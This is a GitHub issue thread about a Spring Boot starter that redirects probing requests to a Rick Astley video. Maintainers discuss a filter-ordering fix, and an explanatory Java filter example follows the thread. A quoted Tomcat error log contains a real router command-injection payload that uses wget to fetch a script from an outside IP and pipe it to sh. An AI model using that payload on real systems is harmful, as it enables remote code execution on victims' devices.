TomCools / rickroll-security-spring-boot-starter

This Spring Boot Starter will reroute configured paths to a video of Rick Astley - Never Gonna Give You Up.

Can't rickroll when RequestRejectedException is thrown #20

Open tschuehly opened 4 months ago

tschuehly commented 4 months ago

My WordPress guys can't formulate proper URLs: image

The request is rejected before the filter and the rickroll is not applied.

I've tried adding an ExceptionAdvice, but Spring routes to the /error endpoint before the exception is caught.

    // Never reached for this case: the request is dispatched to /error before this advice runs.
    @ControllerAdvice
    class RequestRejectedAdvice {
        @ExceptionHandler(RequestRejectedException::class)
        @ResponseBody
        fun handleRequestRejected(e: RequestRejectedException, response: HttpServletResponse) {
            response.sendRedirect("https://www.youtube.com/watch?v=dQw4w9WgXcQ")
        }
    }

TomCools commented 4 months ago

Thanks for the report! Will look into this.

TomCools commented 4 months ago

@tschuehly found the issue, simple missing @Order annotation on the Filter. I do have some issues with my release setup, so it'll be for tomorrow morning.

TomCools commented 4 months ago

@tschuehly: This has been included in a new release: https://github.com/TomCools/rickroll-security-spring-boot-starter/releases/tag/v3.2.1.

I'll close this ticket once you've confirmed it works for you as well ;)

tschuehly commented 3 months ago

Hey @TomCools the fix works!

It doesn't apply if Tomcat catches the request because of an invalid character. This one clogs my logs as well 😔

java.lang.IllegalArgumentException: Invalid character found in the request target [/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.28.141%2Ft+-O-+|+sh%60) ]. 
The valid characters are defined in RFC 7230 and RFC 3986
    at org.apache.coyote.http11.Http11InputBuffer.parseRequestLine(Http11InputBuffer.java:482) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
    at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:264) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
    at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:63) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
    at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:896) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
    at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1744) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
    at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:52) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
    at org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1191) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
    at org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
    at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
    at java.base/java.lang.Thread.run(Unknown Source) ~[na:na]
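
Why the missing @Order mattered, as an added illustration (Java, not the starter's own code): Spring Security's FilterChainProxy, where StrictHttpFirewall throws RequestRejectedException, is registered at SecurityProperties.DEFAULT_FILTER_ORDER (-100), so a redirect filter only sees a rejected-looking request if it is registered ahead of that. The class name, the isTrapPath helper and the path list are assumptions; the Tomcat parse-level rejection shown in the last trace happens before any servlet filter and cannot be intercepted this way.

```java
import java.io.IOException;
import java.util.List;

import jakarta.servlet.FilterChain;
import jakarta.servlet.ServletException;
import jakarta.servlet.http.HttpServletRequest;
import jakarta.servlet.http.HttpServletResponse;

import org.springframework.boot.autoconfigure.security.SecurityProperties;
import org.springframework.boot.web.servlet.FilterRegistrationBean;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.web.filter.OncePerRequestFilter;

@Configuration
public class RickrollFilterConfig {

    // Assumed example paths; the real starter reads its paths from configuration.
    private static final List<String> TRAP_PREFIXES =
            List.of("/wp-admin", "/wp-login.php", "/cgi-bin/");

    static final String TARGET = "https://www.youtube.com/watch?v=dQw4w9WgXcQ";

    /** Pure decision function so the matching rule can be unit-tested without a container. */
    static boolean isTrapPath(String uri) {
        if (uri == null) return false;
        String path = uri.toLowerCase();  // match case-insensitively
        return TRAP_PREFIXES.stream().anyMatch(path::startsWith);
    }

    @Bean
    public FilterRegistrationBean<OncePerRequestFilter> rickrollFilter() {
        OncePerRequestFilter filter = new OncePerRequestFilter() {
            @Override
            protected void doFilterInternal(HttpServletRequest req, HttpServletResponse res,
                                            FilterChain chain) throws ServletException, IOException {
                // getRequestURI() is the path as sent on the request line (not decoded);
                // Spring Security has not inspected it yet at this point.
                if (isTrapPath(req.getRequestURI())) {
                    res.sendRedirect(TARGET);
                    return;  // do not continue into the security filter chain
                }
                chain.doFilter(req, res);
            }
        };
        FilterRegistrationBean<OncePerRequestFilter> reg = new FilterRegistrationBean<>(filter);
        // Any order below -100 runs before Spring Security's FilterChainProxy,
        // i.e. before StrictHttpFirewall gets a chance to reject the request.
        reg.setOrder(SecurityProperties.DEFAULT_FILTER_ORDER - 1);
        return reg;
    }
}
```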